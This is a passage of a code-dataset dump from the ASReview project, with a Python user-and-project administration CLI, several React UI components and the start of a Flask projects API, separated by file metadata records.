sub_parser.add_parser(\n \"list-projects\",\n help=\"List project info from all projects in the ASReview folder.\",\n )\n list_projects_par.add_argument(\n \"-j\",\n \"--json\",\n action=\"store_true\",\n help=\"Create JSON string to connect existing projects with users.\",\n )\n\n link_par = sub_parser.add_parser(\n \"link-projects\", help=\"Link projects to user accounts.\"\n )\n\n link_par.add_argument(\n \"-j\",\n \"--json\",\n type=str,\n help=\"Use a JSON string to link projects to users.\",\n )\n\n link_par.add_argument(\n \"-d\",\n \"--db-path\",\n type=str,\n help=\"Absolute path to authentication sqlite3 database.\",\n required=True,\n )\n\n return parser\n\n\ndef verify_id(id):\n try:\n UUID(id)\n return True\n except ValueError:\n return False\n\n\ndef insert_user(session, entry):\n \"\"\"Inserts a dictionary containing user data\n into the database.\"\"\"\n # create a user object\n user = User(\n entry[\"email\"].lower(),\n email=entry[\"email\"].lower(),\n name=entry[\"name\"],\n affiliation=entry[\"affiliation\"],\n password=entry[\"password\"],\n confirmed=True,\n )\n try:\n session.add(user)\n session.commit()\n print(f\"User 
with email {user.email} created.\")\n return True\n except IntegrityError:\n session.rollback()\n sys.stderr.write(f\"User with identifier {user.email} already exists\")\n return False\n\n\ndef insert_project(session, project):\n # get owner and project id\n owner_id = project[\"owner_id\"]\n project_id = project[\"project_id\"]\n\n # check if this project was already in the database under\n # the old project id\n db_project = (\n session.query(Project).filter(Project.project_id == project_id).one_or_none()\n )\n if db_project is None:\n # create new record\n session.add(Project(owner_id=owner_id, project_id=project_id))\n else:\n # update record (project_id must be the same)\n db_project.owner_id = owner_id\n # commit\n session.commit()\n print(\"Project data is stored.\")\n return True\n\n\ndef get_users(session):\n return session.query(User).all()\n\n\nclass AuthTool(BaseEntryPoint):\n def execute(self, argv):\n parser = auth_parser()\n args = parser.parse_args(argv)\n\n self.args = args\n self.argv = argv\n\n # create a conn object for the database\n if hasattr(self.args, \"db_path\") and self.args.db_path is not None:\n Session = sessionmaker()\n engine = create_engine(f\"sqlite:///{self.args.db_path}\")\n Session.configure(bind=engine)\n self.session = Session()\n\n if \"add-users\" in argv:\n self.add_users()\n elif \"list-users\" in argv:\n self.list_users()\n elif \"list-projects\" in argv:\n self.list_projects()\n elif \"link-projects\" in argv:\n self.link_projects()\n\n def add_users(self):\n if self.args.json is not None:\n entries = json.loads(self.args.json)\n # try to insert entries into the database\n for entry in entries:\n insert_user(self.session, entry)\n else:\n self.enter_users()\n\n def _ensure_valid_value_for(self, name, validation_function, hint=\"\"):\n \"\"\"Prompt user for validated input.\"\"\"\n while True:\n value = input(f\"{name}: \")\n if validation_function(value):\n return value\n else:\n sys.stderr.write(hint)\n\n def enter_users(self):\n while True:\n new_user = input(\"Enter a new user [Y/n]? 
\")\n if new_user == \"Y\":\n email = self._ensure_valid_value_for(\n \"Email address (required)\",\n User.valid_email,\n \"Entered email address is not recognized as a valid email address.\", # noqa\n )\n name = self._ensure_valid_value_for(\n \"Full name (required)\",\n lambda x: bool(x) and len(x) > 2,\n \"Full name must contain more than 2 characters.\",\n )\n affiliation = input(\"Affiliation: \")\n password = self._ensure_valid_value_for(\n \"Password (required)\",\n User.valid_password,\n \"Use 8 or more characters with a mix of letters, numbers & symbols.\", # noqa\n )\n\n insert_user(\n self.session,\n {\n \"email\": email,\n \"name\": name,\n \"affiliation\": affiliation,\n \"password\": password,\n },\n )\n else:\n break\n\n return True\n\n def _print_project(self, project):\n print(f\"\\n* {project['folder']}\")\n print(f\"\\tversion: {project['version']}\")\n print(f\"\\tid: {project['project_id']}\")\n print(f\"\\tname: {project['name']}\")\n print(f\"\\tauthors: {project['authors']}\")\n print(f\"\\tcreated: {project['created']}\")\n\n def _print_user(self, user):\n if bool(user.affiliation):\n postfix = f\", {user.affiliation}\"\n else:\n postfix = \"\"\n print(f\" {user.id} - {user.email} ({user.name}){postfix}\")\n\n def _get_projects(self):\n projects = [f for f in asreview_path().glob(\"*\") if f.is_dir()]\n result = []\n for folder in projects:\n project = ASReviewProject(folder)\n\n # Raise a RuntimeError if the project version is too low.\n if project.config.get(\"version\").startswith(\"0.\"):\n id = project.config.get(\"id\")\n message = f\"\"\"Version of project with id {id} is too old,\n please upgrade first before using this tool.\"\"\"\n raise RuntimeError(message)\n\n result.append(\n {\n \"folder\": folder.name,\n \"version\": project.config.get(\"version\"),\n \"project_id\": project.config.get(\"id\"),\n \"name\": project.config.get(\"name\"),\n \"authors\": project.config.get(\"authors\"),\n \"created\": project.config.get(\"datetimeCreated\"),\n \"owner_id\": 0,\n }\n )\n return result\n\n def list_users(self):\n users = get_users(self.session)\n print()\n for user in users:\n self._print_user(user)\n print()\n\n def list_projects(self):\n projects = self._get_projects()\n if self.args.json:\n # dump the data twice to create a string\n # that can be loaded again by the tool.\n print(json.dumps(json.dumps(projects)))\n else:\n [self._print_project(p) for p in projects]\n if len(projects) > 0:\n print()\n\n def _generate_project_links(self):\n result = []\n # get users and projects\n users = get_users(self.session)\n user_ids = [u.id for u in users]\n projects = self._get_projects()\n # print projects\n for project in projects:\n self._print_project(project)\n print(\"Who's the owner of this project?\")\n print(\"--------------------------------\")\n for user in users:\n self._print_user(user)\n id = None\n # and ask who the owner is\n while True:\n id = input(\"Enter the ID number of the owner: \")\n try:\n if isinstance(id, str):\n id = id.replace(\".\", \"\")\n id = int(id)\n if id not in user_ids:\n print(\"Entered ID does not exists, try again.\")\n else:\n insert_project(\n self.session,\n {\"project_id\": project[\"project_id\"], \"owner_id\": id},\n )\n break\n except ValueError:\n sys.stderr.write(\"Entered ID is not a number, please try again.\")\n return result\n\n def link_projects(self):\n # bulk JSON vs interactive\n if self.args.json is not None:\n projects = json.loads(self.args.json)\n # enter data in the database\n for project in 
projects:\n insert_project(self.session, project)\n else:\n self._generate_project_links()\n" }, { "alpha_fraction": 0.5318639874458313, "alphanum_fraction": 0.5336272120475769, "avg_line_length": 30.13725471496582, "blob_id": "902ef85e060cf7f8d3bde2f0acc6086c13997dfa", "content_id": "dba41c8c84a680a140e211c698ee8b661ad24926", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7940, "license_type": "permissive", "max_line_length": 80, "num_lines": 255, "path": "/asreview/webapp/src/ProjectComponents/DetailsComponents/DetailsPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport {\n Box,\n Button,\n Fade,\n IconButton,\n Menu,\n MenuItem,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { MoreVert } from \"@mui/icons-material\";\nimport LoadingButton from \"@mui/lab/LoadingButton\";\n\nimport { ProjectInfoForm, ProjectDeleteDialog } from \"../../ProjectComponents\";\nimport { ActionsFeedbackBar } from \"../../Components\";\nimport { DataForm, ModelForm } from \"../DetailsComponents\";\nimport { TypographyH5Medium } from \"../../StyledComponents/StyledTypography.js\";\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { projectModes, projectStatuses } from \"../../globals.js\";\nimport { useToggle } from \"../../hooks/useToggle\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst DetailsPage = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const [anchorEl, setAnchorEl] = React.useState(null);\n const onOptions = Boolean(anchorEl);\n\n const [onDeleteDialog, toggleDeleteDialog] = useToggle();\n const [disableSaveButton, setDisableSaveButton] = React.useState(true);\n const [disableUndoButton, setDisableUndoButton] = React.useState(true);\n const [info, setInfo] = React.useState({\n mode: props.info?.mode,\n title: props.info?.name,\n authors: props.info?.authors,\n description: props.info?.description,\n });\n\n const {\n error: mutateInfoError,\n isError: isMutateInfoError,\n isLoading: isMutatingInfo,\n isSuccess: isMutateInfoSuccess,\n mutate: mutateInfo,\n reset: resetMutateInfo,\n } = useMutation(ProjectAPI.mutateInfo, {\n onSuccess: (data, variables) => {\n setDisableSaveButton(true);\n setDisableUndoButton(true);\n // update cached data\n queryClient.setQueryData(\n [\"fetchInfo\", { project_id: variables.project_id }],\n (prev) => {\n return {\n ...prev,\n name: variables.title,\n authors: variables.authors,\n description: variables.description,\n };\n },\n );\n },\n });\n\n const {\n error: mutateStatusError,\n isError: isMutateStatusError,\n mutate: mutateStatus,\n reset: resetMutateStatus,\n } = useMutation(ProjectAPI.mutateProjectStatus, {\n onSuccess: () => {\n queryClient.invalidateQueries(\"fetchInfo\");\n },\n });\n\n const handleClickUndoChanges = () => {\n setInfo({\n ...info,\n title: props.info?.name,\n authors: props.info?.authors,\n description: props.info?.description,\n });\n setDisableSaveButton(true);\n setDisableUndoButton(true);\n };\n\n const handleClickSave = () => {\n mutateInfo({\n project_id,\n mode: info.mode,\n title: info.title,\n authors: info.authors,\n description: info.description,\n });\n };\n\n const handleClickOptions = (event) => {\n 
setAnchorEl(event.currentTarget);\n };\n\n const handleCloseOptions = () => {\n setAnchorEl(null);\n };\n\n const handleChangeStatus = () => {\n handleCloseOptions();\n mutateStatus({\n project_id,\n status:\n props.info?.reviews[0].status === projectStatuses.REVIEW\n ? projectStatuses.FINISHED\n : projectStatuses.REVIEW,\n });\n };\n\n const handleClickDelete = () => {\n handleCloseOptions();\n toggleDeleteDialog();\n };\n\n return (\n <Root aria-label=\"details page\">\n <Fade in>\n <Box>\n {/* Page title */}\n <Box\n className=\"main-page-sticky-header-wrapper\"\n sx={{ background: (theme) => theme.palette.background.paper }}\n >\n <Box className=\"main-page-sticky-header with-button\">\n {!props.mobileScreen && (\n <TypographyH5Medium>Details</TypographyH5Medium>\n )}\n {props.mobileScreen && (\n <Typography variant=\"h6\">Details</Typography>\n )}\n <Stack direction=\"row\" spacing={1}>\n <Button\n disabled={disableUndoButton}\n onClick={handleClickUndoChanges}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Undo Changes\n </Button>\n <Tooltip\n disableFocusListener={!props.isSimulating}\n disableHoverListener={!props.isSimulating}\n disableTouchListener={!props.isSimulating}\n title=\"Save after simulation is finished\"\n >\n <span>\n <LoadingButton\n disabled={disableSaveButton || props.isSimulating}\n loading={isMutatingInfo}\n variant=\"contained\"\n onClick={handleClickSave}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Save\n </LoadingButton>\n </span>\n </Tooltip>\n <Box>\n <Tooltip title=\"Options\">\n <IconButton\n onClick={handleClickOptions}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n <MoreVert\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n </IconButton>\n </Tooltip>\n <Menu\n anchorEl={anchorEl}\n open={onOptions}\n onClose={handleCloseOptions}\n >\n {info.mode !== projectModes.SIMULATION && (\n <MenuItem onClick={handleChangeStatus}>\n {props.info?.reviews[0].status ===\n projectStatuses.REVIEW\n ? \"Mark as finished\"\n : \"Mark as in review\"}\n </MenuItem>\n )}\n <MenuItem onClick={handleClickDelete}>Delete</MenuItem>\n </Menu>\n </Box>\n </Stack>\n </Box>\n </Box>\n\n {/* Page body */}\n <Box className=\"main-page-body-wrapper\">\n <Stack\n className=\"main-page-body\"\n direction={!props.mobileScreen ? \"row\" : \"column\"}\n spacing={3}\n >\n <ProjectInfoForm\n info={info}\n mobileScreen={props.mobileScreen}\n setInfo={setInfo}\n setDisableSaveButton={setDisableSaveButton}\n setDisableUndoButton={setDisableUndoButton}\n />\n <Stack\n spacing={3}\n sx={{ width: !props.mobileScreen ? 
\"40%\" : \"100%\" }}\n >\n <DataForm setHistoryFilterQuery={props.setHistoryFilterQuery} />\n <ModelForm />\n </Stack>\n </Stack>\n </Box>\n </Box>\n </Fade>\n <ProjectDeleteDialog\n onDeleteDialog={onDeleteDialog}\n toggleDeleteDialog={toggleDeleteDialog}\n projectTitle={props.info?.name}\n project_id={project_id}\n />\n <ActionsFeedbackBar\n feedback=\"Changes saved\"\n open={isMutateInfoSuccess}\n onClose={resetMutateInfo}\n />\n {isMutateInfoError && (\n <ActionsFeedbackBar\n feedback={mutateInfoError?.message + \" Please try again.\"}\n open={isMutateInfoError}\n onClose={resetMutateInfo}\n />\n )}\n {isMutateStatusError && (\n <ActionsFeedbackBar\n feedback={mutateStatusError?.message + \" Please try again.\"}\n open={isMutateStatusError}\n onClose={resetMutateStatus}\n />\n )}\n </Root>\n );\n};\n\nexport default DetailsPage;\n" }, { "alpha_fraction": 0.4992004632949829, "alphanum_fraction": 0.5068196654319763, "avg_line_length": 28.448753356933594, "blob_id": "8a95a29017901fb90bd9b20937b6d064b23e82a1", "content_id": "cd297436a3da7e11371fece19c0770b9221f7439", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 10631, "license_type": "permissive", "max_line_length": 125, "num_lines": 361, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/ProgressDensityChart.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport Chart from \"react-apexcharts\";\nimport {\n Box,\n Card,\n CardContent,\n Stack,\n Tooltip,\n tooltipClasses,\n Typography,\n} from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\nimport { HelpOutline } from \"@mui/icons-material\";\n\nimport { CardErrorHandler } from \"../../Components\";\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography.js\";\n\nimport tooltipRelevantLight from \"../../images/progress_relevant_light.png\";\nimport tooltipRelevantDark from \"../../images/progress_relevant_dark.png\";\nimport tooltipIrrelevantLight from \"../../images/progress_irrelevant_light.png\";\nimport tooltipIrrelevantDark from \"../../images/progress_irrelevant_dark.png\";\n\nimport \"./AnalyticsPage.css\";\n\nconst PREFIX = \"ProgressDensityChart\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n title: `${PREFIX}-title`,\n tooltipCardColor: `${PREFIX}-tooltip-card-color`,\n tooltipLabelContainer: `${PREFIX}-tooltip-label-container`,\n tooltipLabelMarkerRelevantColor: `${PREFIX}-tooltip-label-marker-relevant-color`,\n tooltipLabelRelevantNumber: `${PREFIX}-tooltip-label-relevant-number`,\n tooltipLabelTextSecondaryColor: `${PREFIX}-tooltip-label-text-secondary-color`,\n};\n\nconst StyledCard = styled(Card)(({ theme }) => ({\n borderRadius: 16,\n maxWidth: 960,\n overflow: \"visible\",\n position: \"relative\",\n width: \"100%\",\n [`& .${classes.root}`]: {\n paddingTop: 24,\n paddingLeft: 32,\n paddingRight: 32,\n },\n\n [`& .${classes.title}`]: {\n display: \"flex\",\n alignItems: \"baseline\",\n },\n\n [`& .${classes.tooltipCardColor}`]: {\n color: theme.palette.text.primary,\n background: theme.palette.background.paper,\n },\n\n [`& .${classes.tooltipLabelContainer}`]: {\n display: \"flex\",\n alignItems: \"baseline\",\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.tooltipLabelMarkerRelevantColor}`]: {\n ...(theme.palette.mode === \"light\" && {\n color: theme.palette.primary.light,\n background: theme.palette.primary.light,\n }),\n ...(theme.palette.mode 
=== \"dark\" && {\n color: theme.palette.primary.main,\n background: theme.palette.primary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelRelevantNumber}`]: {\n marginLeft: 20,\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.primary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelTextSecondaryColor}`]: {\n color: theme.palette.text.secondary,\n },\n}));\n\nconst StyledTooltip = styled(({ className, ...props }) => (\n <Tooltip {...props} classes={{ popper: className }} />\n))(({ theme }) => ({\n [`& .${tooltipClasses.tooltip}`]: {\n backgroundColor: theme.palette.background.paper,\n color: theme.palette.text.primary,\n padding: 0,\n maxWidth: 410,\n fontSize: theme.typography.pxToRem(12),\n },\n}));\n\nconst customTooltip = ({ series, seriesIndex, dataPointIndex, w }) => {\n let total = dataPointIndex + 1;\n return (\n `<div class=\"tooltip-card ProgressDensityChart-tooltip-card-color\">` +\n '<div class=\"tooltip-card-content\">' +\n '<h6 class=\"tooltip-title\">' +\n total +\n ` reviewed records` +\n \"</h6>\" +\n `<div class=\"ProgressDensityChart-tooltip-label-container\">` +\n \"<div>\" +\n \"<div>\" +\n `<span class=\"apexcharts-legend-marker tooltip-label-marker ProgressDensityChart-tooltip-label-marker-relevant-color\">` +\n \"</span>\" +\n `<span class=\"apexcharts-legend-text tooltip-label-text\">` +\n \"Relevant in last 10 reviewed\" +\n \"</span>\" +\n \"</div>\" +\n `<p class=\"tooltip-label-text-secondary ProgressDensityChart-tooltip-label-text-secondary-color\">` +\n \"Relevant records that you labeled in the last 10 reviewed\" +\n \"</p>\" +\n \"</div>\" +\n `<h6 class=\"tooltip-label-number ProgressDensityChart-tooltip-label-relevant-number\">` +\n series[0][dataPointIndex] +\n \"</h6>\" +\n \"</div>\" +\n \"</div>\" +\n \"</div>\"\n );\n};\n\nexport default function ProgressDensityChart(props) {\n const theme = useTheme();\n\n const returnTooltipRelevantImg = () => {\n if (theme.palette.mode === \"light\") {\n return tooltipRelevantLight;\n }\n if (theme.palette.mode === \"dark\") {\n return tooltipRelevantDark;\n }\n };\n\n const returnTooltipIrrelevantImg = () => {\n if (theme.palette.mode === \"light\") {\n return tooltipIrrelevantLight;\n }\n if (theme.palette.mode === \"dark\") {\n return tooltipIrrelevantDark;\n }\n };\n\n /**\n * Chart data array\n */\n const seriesArray = React.useCallback(() => {\n if (props.progressDensityQuery.data) {\n return [\n {\n name: \"Relevant records\",\n data: props.progressDensityQuery.data?.relevant,\n },\n ];\n } else {\n return [];\n }\n }, [props.progressDensityQuery.data]);\n\n /**\n * Chart options\n */\n const optionsChart = React.useCallback(() => {\n return {\n chart: {\n animations: {\n enabled: false,\n },\n background: \"transparent\",\n id: \"ASReviewLABprogressDensity\",\n type: \"area\",\n stacked: true,\n toolbar: {\n show: !props.mobileScreen,\n },\n },\n colors: [\n theme.palette.mode === \"light\"\n ? theme.palette.primary.light\n : theme.palette.primary.main,\n \"#CED4DC\",\n ],\n dataLabels: {\n enabled: false,\n },\n fill: {\n type: \"gradient\",\n gradient: {\n shadeIntensity: theme.palette.mode === \"light\" ? 0.9 : 0.2,\n opacityFrom: 0.5,\n opacityTo: 0.9,\n },\n },\n legend: {\n position: \"top\",\n horizontalAlign: \"left\",\n fontSize: !props.mobileScreen ? 
\"14px\" : \"12px\",\n fontFamily: theme.typography.subtitle2.fontFamily,\n fontWeight: theme.typography.subtitle2.fontWeight,\n labels: {\n colors: theme.palette.text.secondary,\n },\n markers: {\n width: 8,\n height: 8,\n offsetX: -4,\n },\n itemMargin: {\n horizontal: 16,\n },\n },\n markers: {\n size: 0,\n },\n noData: {\n text: \"No data available\",\n },\n stroke: {\n curve: \"smooth\",\n lineCap: \"round\",\n width: 2,\n },\n theme: {\n mode: theme.palette.mode,\n },\n tooltip: {\n custom: customTooltip,\n },\n xaxis: {\n decimalsInFloat: 0,\n title: {\n text: \"Number of reviewed records\",\n },\n type: \"numeric\",\n labels: {\n show: true,\n },\n axisTicks: {\n show: false,\n },\n tooltip: {\n enabled: false,\n },\n },\n yaxis: {\n showAlways: false,\n max: 10,\n min: 0,\n tickAmount: 3,\n title: {\n text: \"Number of relevant records\",\n },\n },\n };\n }, [theme, props.mobileScreen]);\n\n const [series, setSeries] = React.useState(seriesArray());\n const [options, setOptions] = React.useState(optionsChart());\n\n React.useEffect(() => {\n setSeries(seriesArray());\n setOptions(optionsChart());\n }, [seriesArray, optionsChart]);\n\n return (\n <StyledCard elevation={2}>\n <CardErrorHandler\n queryKey={\"fetchProgressDensity\"}\n error={props.progressDensityQuery.error}\n isError={props.progressDensityQuery.isError}\n />\n <CardContent className={classes.root}>\n <Stack spacing={2}>\n <Box className={classes.title}>\n {!props.mobileScreen && (\n <Typography variant=\"h6\">Progress</Typography>\n )}\n {props.mobileScreen && (\n <TypographySubtitle1Medium>Progress</TypographySubtitle1Medium>\n )}\n <StyledTooltip\n title={\n <React.Fragment>\n <Card sx={{ backgroundImage: \"none\" }}>\n <CardContent>\n <Stack spacing={2}>\n <Box sx={{ display: \"flex\" }}>\n <Stack direction=\"row\" spacing={2}>\n <img\n src={returnTooltipRelevantImg()}\n alt=\"tooltip relevant\"\n className=\"tooltip-img\"\n />\n <Box>\n <Typography variant=\"subtitle2\">\n Presence of relevant records\n </Typography>\n <Typography\n variant=\"body2\"\n sx={{ color: \"text.secondary\" }}\n >\n Relevant records still appear. Continue\n reviewing to discover more.\n </Typography>\n </Box>\n </Stack>\n </Box>\n <Box sx={{ display: \"flex\" }}>\n <Stack direction=\"row\" spacing={2}>\n <img\n src={returnTooltipIrrelevantImg()}\n alt=\"tooltip irrelevant\"\n className=\"tooltip-img\"\n />\n <Box>\n <Typography variant=\"subtitle2\">\n Irrelevant records only\n </Typography>\n <Typography\n variant=\"body2\"\n sx={{ color: \"text.secondary\" }}\n >\n Relevant records do not appear. Refer to your\n stopping rule to decide if you want to continue\n reviewing.\n </Typography>\n </Box>\n </Stack>\n </Box>\n </Stack>\n </CardContent>\n </Card>\n </React.Fragment>\n }\n >\n <HelpOutline\n fontSize={!props.mobileScreen ? 
\"small\" : \"12px\"}\n sx={{ color: \"text.secondary\", marginLeft: \"8px\" }}\n />\n </StyledTooltip>\n </Box>\n <Chart\n options={options}\n series={series}\n type=\"area\"\n height={230}\n width=\"100%\"\n />\n </Stack>\n </CardContent>\n </StyledCard>\n );\n}\n" }, { "alpha_fraction": 0.6842619776725769, "alphanum_fraction": 0.6842619776725769, "avg_line_length": 30.96875, "blob_id": "7dfda61c66d93966656e91a1f73c0b3ea5fbc78b", "content_id": "717c86c62226cd90000418c0e29367a59907c12b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1023, "license_type": "permissive", "max_line_length": 70, "num_lines": 32, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/ConfirmationDialog.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { Button } from \"@mui/material\";\nimport Dialog from \"@mui/material/Dialog\";\nimport DialogActions from \"@mui/material/DialogActions\";\nimport DialogContent from \"@mui/material/DialogContent\";\nimport DialogContentText from \"@mui/material/DialogContentText\";\nimport DialogTitle from \"@mui/material/DialogTitle\";\n\nconst ConfirmationDialog = (props) => {\n return (\n <Dialog\n open={props.open}\n onClose={props.handleCancel}\n aria-labelledby=\"alert-dialog-title\"\n aria-describedby=\"alert-dialog-description\"\n >\n <DialogTitle id=\"alert-dialog-title\">{props.title}</DialogTitle>\n <DialogContent>\n <DialogContentText id=\"alert-dialog-description\">\n {props.contents}\n </DialogContentText>\n </DialogContent>\n <DialogActions>\n <Button onClick={props.handleCancel}>Cancel</Button>\n <Button onClick={props.handleConfirm} autoFocus>\n Remove\n </Button>\n </DialogActions>\n </Dialog>\n );\n};\n\nexport default ConfirmationDialog;\n" }, { "alpha_fraction": 0.586410403251648, "alphanum_fraction": 0.5920366644859314, "avg_line_length": 31.071292877197266, "blob_id": "59d575783dd5adadbd11208031f97ef021504f97", "content_id": "e8ecea811d04a2d89395818dca071a1c7b84b461", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50833, "license_type": "permissive", "max_line_length": 87, "num_lines": 1585, "path": "/asreview/webapp/api/projects.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\nimport shutil\nimport subprocess\nimport tempfile\nfrom pathlib import Path\nfrom urllib.request import urlretrieve\nfrom uuid import uuid4\n\nimport datahugger\nimport numpy as np\nimport pandas as pd\nfrom flask import Blueprint\nfrom flask import abort\nfrom flask import current_app\nfrom flask import jsonify\nfrom flask import request\nfrom flask import send_file\nfrom flask_login import current_user\nfrom sqlalchemy import and_\nfrom werkzeug.exceptions import InternalServerError\nfrom werkzeug.utils import secure_filename\n\nfrom asreview.config import DEFAULT_BALANCE_STRATEGY\nfrom asreview.config import DEFAULT_FEATURE_EXTRACTION\nfrom asreview.config import DEFAULT_MODEL\nfrom asreview.config import DEFAULT_QUERY_STRATEGY\nfrom asreview.config import PROJECT_MODE_EXPLORE\nfrom asreview.config import PROJECT_MODE_SIMULATE\nfrom asreview.data import ASReviewData\nfrom asreview.data.statistics import n_duplicates\nfrom asreview.datasets import DatasetManager\nfrom asreview.exceptions import BadFileFormatError\nfrom asreview.io import list_readers\nfrom asreview.io import list_writers\nfrom asreview.models.balance import get_balance_model\nfrom asreview.models.balance import list_balance_strategies\nfrom asreview.models.classifiers import get_classifier\nfrom asreview.models.classifiers import list_classifiers\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.feature_extraction import list_feature_extraction\nfrom asreview.models.query import get_query_model\nfrom asreview.models.query import list_query_strategies\nfrom asreview.project import ASReviewProject\nfrom asreview.project import ProjectNotFoundError\nfrom asreview.project import get_project_path\nfrom asreview.project import get_projects\nfrom asreview.project import is_v0_project\nfrom asreview.project import open_state\nfrom asreview.project import project_from_id\nfrom asreview.search import SearchError\nfrom asreview.search import fuzzy_find\nfrom asreview.settings import ASReviewSettings\nfrom asreview.state.errors import StateError\nfrom asreview.state.errors import StateNotFoundError\nfrom asreview.state.sql_converter import upgrade_asreview_project_file\nfrom asreview.state.sql_converter import upgrade_project_config\nfrom asreview.utils import _get_executable\nfrom asreview.utils import _get_filename_from_url\nfrom asreview.utils import asreview_path\nfrom asreview.utils import list_reader_names\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.login_required import app_is_authenticated\nfrom asreview.webapp.authentication.login_required import asreview_login_required\nfrom asreview.webapp.authentication.login_required import project_authorization\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.io import read_data\n\nbp = Blueprint(\"api\", __name__, url_prefix=\"/api\")\n\n\n# error handlers\[email protected](ValueError)\ndef 
value_error(e):\n message = str(e) if str(e) else \"Incorrect value.\"\n logging.error(message)\n return jsonify(message=message), 400\n\n\[email protected](ProjectNotFoundError)\ndef project_not_found(e):\n message = str(e) if str(e) else \"Project not found.\"\n logging.error(message)\n return jsonify(message=message), 404\n\n\[email protected](InternalServerError)\ndef error_500(e):\n original = getattr(e, \"original_exception\", None)\n\n if original is None or str(e.original_exception) == \"\":\n # direct 500 error, such as abort(500)\n logging.error(e)\n return jsonify(message=\"Whoops, something went wrong.\"), 500\n\n # wrapped unhandled error\n logging.error(e.original_exception)\n return jsonify(message=str(e.original_exception)), 500\n\n\n# routes\[email protected](\"/projects\", methods=[\"GET\"])\n@asreview_login_required\ndef api_get_projects(): # noqa: F401\n \"\"\"\"\"\"\n project_info = []\n\n if app_is_authenticated(current_app):\n # authenticated with User accounts\n user_db_projects = list(current_user.projects) + list(current_user.involved_in)\n project_paths = [project.project_path for project in user_db_projects]\n owner_ids = [project.owner_id for project in user_db_projects]\n projects = get_projects(project_paths)\n else:\n # force get_projects to list the .asreview folder\n projects = get_projects(None)\n owner_ids = [None for p in projects]\n\n for project, owner_id in zip(projects, owner_ids):\n try:\n project_config = project.config\n\n # upgrade info of v0 projects\n if project_config[\"version\"].startswith(\"0\"):\n project_config = upgrade_project_config(project_config)\n project_config[\"projectNeedsUpgrade\"] = True\n\n # add ownership information if authentication is enabled\n if app_is_authenticated(current_app):\n project_config[\"owner_id\"] = owner_id\n\n logging.info(\"Project found: {}\".format(project_config[\"id\"]))\n project_info.append(project_config)\n\n except Exception as err:\n logging.error(err)\n\n # sort the projects based on created_at_unix\n project_info = sorted(\n project_info,\n key=lambda y: (y[\"created_at_unix\"] is not None, y[\"created_at_unix\"]),\n reverse=True,\n )\n\n response = jsonify({\"result\": project_info})\n\n return response\n\n\[email protected](\"/projects/stats\", methods=[\"GET\"])\n@asreview_login_required\ndef api_get_projects_stats(): # noqa: F401\n \"\"\"Get dashboard statistics of all projects\"\"\"\n\n stats_counter = {\"n_in_review\": 0, \"n_finished\": 0, \"n_setup\": 0}\n\n if app_is_authenticated(current_app):\n user_db_projects = list(current_user.projects) + list(current_user.involved_in)\n project_paths = [project.project_path for project in user_db_projects]\n else:\n # force get_projects to list the .asreview folder\n project_paths = None\n\n for project in get_projects(project_paths):\n project_config = project.config\n\n # upgrade info of v0 projects\n if project_config[\"version\"].startswith(\"0\"):\n project_config = upgrade_project_config(project_config)\n project_config[\"projectNeedsUpgrade\"] = True\n\n # get dashboard statistics\n try:\n if project_config[\"reviews\"][0][\"status\"] == \"review\":\n stats_counter[\"n_in_review\"] += 1\n elif project_config[\"reviews\"][0][\"status\"] == \"finished\":\n stats_counter[\"n_finished\"] += 1\n else:\n stats_counter[\"n_setup\"] += 1\n except Exception:\n stats_counter[\"n_setup\"] += 1\n\n response = jsonify({\"result\": stats_counter})\n\n return response\n\n\[email protected](\"/projects/info\", 
